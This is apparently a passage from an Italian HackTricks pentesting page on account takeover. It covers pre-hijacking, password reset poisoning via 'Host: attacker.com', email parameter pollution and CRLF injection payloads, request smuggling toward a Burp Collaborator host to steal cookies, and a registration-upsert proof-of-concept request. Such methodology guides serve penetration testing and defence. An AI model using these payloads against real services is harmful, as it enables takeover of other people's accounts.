def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: invia lo stesso OTP valido simultaneamente in due sessioni; a volte una sessione diventa un account dell'attaccante verificato mentre il flusso della vittima riesce comunque.
- Test anche Host header poisoning sui link di verifica (come reset poisoning qui sotto) per leak o per completare la verifica su un host controllato dall'attaccante.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (prima che la vittima si registri)

Una potente classe di problemi si verifica quando un attaccante compie azioni sull'email della vittima prima che questa crei l'account, per poi recuperare l'accesso successivamente.

Tecniche chiave da testare (adattare ai flussi del target):

- Classic–Federated Merge
- Attaccante: registra un account classic con l'email della vittima e imposta una password
- Vittima: si registra successivamente con SSO (stesso indirizzo email)
- Merge insicuri possono lasciare entrambe le parti loggate o riportare in vita l'accesso dell'attaccante
- Unexpired Session Identifier
- Attaccante: crea un account e mantiene una sessione a lunga durata (non effettuare il logout)
- Vittima: recupera/imposta la password e usa l'account
- Testare se le vecchie sessioni restano valide dopo reset o abilitazione della MFA
- Trojan Identifier
- Attaccante: aggiunge un identificatore secondario all'account pre‑creato (telefono, email aggiuntiva, o collega l'IdP dell'attaccante)
- Vittima: resetta la password; l'attaccante poi usa il trojan identifier per resettare/loggare
- Unexpired Email Change
- Attaccante: avvia un cambio email verso la mail dell'attaccante e trattiene la conferma
- Vittima: recupera l'account e inizia a usarlo
- Attaccante: completa più tardi il cambio email pendente per rubare l'account
- Non‑Verifying IdP
- Attaccante: usa un IdP che non verifica la proprietà dell'email per affermare `victim@…`
- Vittima: si registra tramite la procedura classica
- Il servizio effettua merge sull'email senza controllare `email_verified` o eseguire una verifica locale

Suggerimenti pratici

- Raccogli i flussi e gli endpoint dai bundle web/mobile. Cerca classic signup, linking SSO, cambio email/telefono e endpoint di password reset.
- Crea automazioni realistiche per mantenere le sessioni attive mentre testi altri flussi.
- Per i test SSO, avvia un provider OIDC di test ed emetti token con claim `email` per l'indirizzo della vittima e `email_verified=false` per verificare se la RP si fida di IdP non verificati.
- Dopo qualsiasi password reset o cambio email, verifica che:
- tutte le altre sessioni e i token siano invalidati,
- le capacità di cambio email/telefono pendenti siano cancellate,
- gli IdP/email/telefoni precedentemente collegati siano ri‑verificati.

Nota: Metodologie estese e case study di queste tecniche sono documentate nella Microsoft’s pre‑hijacking research (vedi Riferimenti alla fine).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Richiedi il password reset per il tuo indirizzo email
2. Clicca sul link di password reset
3. Non cambiare la password
4. Clicca su qualsiasi sito di terze parti (eg: Facebook, twitter)
5. Intercetta la richiesta nel proxy di Burp Suite
6. Verifica se l'header referer sta leaking il password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercetta la richiesta di password reset in Burp Suite
2. Aggiungi o modifica i seguenti header in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Inoltra la richiesta con l'header modificato\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Cerca un URL di password reset basato sull'_host header_ come : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. L’attaccante deve effettuare il login con il proprio account e andare alla funzionalità Change password.
2. Avvia Burp Suite e intercetta la richiesta
3. Invia la richiesta alla scheda repeater ed modifica i parametri : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

The password reset token should be randomly generated and unique every time.
Prova a determinare se il token scade o se è sempre lo stesso; in alcuni casi l’algoritmo di generazione è debole e può essere indovinato. Le seguenti variabili potrebbero essere usate dall’algoritmo.

• Timestamp
• UserID
• Email of User
• Firstname and Lastname
• Date of Birth
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Attiva una richiesta di reset della password usando l’API/UI per una email specifica e.g: test@mail.com
2. Ispeziona la risposta del server e verifica la presenza di resetToken
3. Poi usa il token in un URL come https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

1. Registrati sul sistema con uno username identico a quello della vittima, ma con spazi bianchi inseriti prima e/o dopo lo username. e.g: "admin "
2. Richiedi il reset della password con il tuo username malevolo.
3. Usa il token inviato alla tua email e reimposta la password della vittima.
4. Accedi all’account della vittima con la nuova password.

La piattaforma CTFd è stata vulnerabile a questo attacco.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

1. Trova una XSS dentro l’applicazione o in un sottodominio se i cookie sono impostati sul dominio principale : *.domain.com
2. Leak il cookie corrente sessions cookie
3. Autenticati come l’utente usando il cookie

Account Takeover Via HTTP Request Smuggling

1. Usa smuggler per rilevare il tipo di HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Crea una request che sovrascriva il POST / HTTP/1.1 con i seguenti dati:
   GET http://something.burpcollaborator.net HTTP/1.1 X: con l’obiettivo di effettuare un open redirect delle vittime verso burpcollab e rubare i loro cookie\
3. La request finale potrebbe apparire come la seguente

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone segnala lo sfruttamento di questo bug\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. Crea un payload per il CSRF, e.g: “HTML form with auto submit for a password change”
2. Invia il payload

Account Takeover via JWT

JSON Web Token potrebbe essere usato per autenticare un utente.

• Modifica il JWT con un altro User ID / Email
• Verifica se la firma del JWT è debole

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Alcuni signup handler eseguono un upsert quando l’email fornita esiste già. Se l’endpoint accetta un body minimale contenente email e password e non applica la verifica di proprietà, inviare l’email della vittima sovrascriverà la sua password pre-auth.

• Discovery: raccogli i nomi degli endpoint dal bundled JS (o dal traffico dell’app mobile), poi fuzz base path come /parents/application/v4/admin/FUZZ usando ffuf/dirsearch.
• Method hints: una GET che restituisce messaggi come “Only POST request is allowed.” spesso indica il verbo corretto e che è atteso un body JSON.
• Body minimale osservato nel mondo reale:

{"email":"victim@example.com","password":"New@12345"}

Esempio di PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Impatto: Full Account Takeover (ATO) senza alcun reset token, OTP o verifica dell’email.

Riferimenti

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

• Controlla i piani di abbonamento!
• Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
• Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.